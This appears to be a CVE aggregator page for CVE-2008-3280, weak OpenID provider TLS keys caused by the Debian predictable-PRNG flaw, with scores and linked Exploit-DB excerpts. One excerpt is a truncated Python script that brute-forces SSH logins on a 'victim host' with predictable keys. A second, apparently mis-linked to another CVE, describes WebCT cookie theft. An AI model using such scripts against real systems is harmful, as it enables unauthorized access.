CVE-2008-3280
published 2021-05-21CVE-2008-3280: It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator…
PriorityP340medium5.9CVSS 3.1
AVNACHPRNUINSUCHINAN
EXPLOIT
EPSS
3.95%
89.1th percentile
It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs.
CVSS provenance
nvdv3.15.9MEDIUMCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
exploitdb·2008-06-01
CVE-2008-3280 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
OpenSSL 0.9.8c-1 [[port] [threads]]'
print ' : Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' : The victim host'
print ' : The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,p
Exploit-DB
WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection
exploitdb·2007-06-25
CVE-2008-1225 WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection
WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection
---
source: https://www.securityfocus.com/bid/28107/info
WebCT is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
This issue affects WebCT 4.1.5.8; other versions may also be vulnerable.
WebCT 4.x Javascript Session Stealer Exploits
Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
Affected Version: 4.1.5.8
Discoverer: Benjamin "balupt
No writeups or analysis indexed.
2021-05-21
Published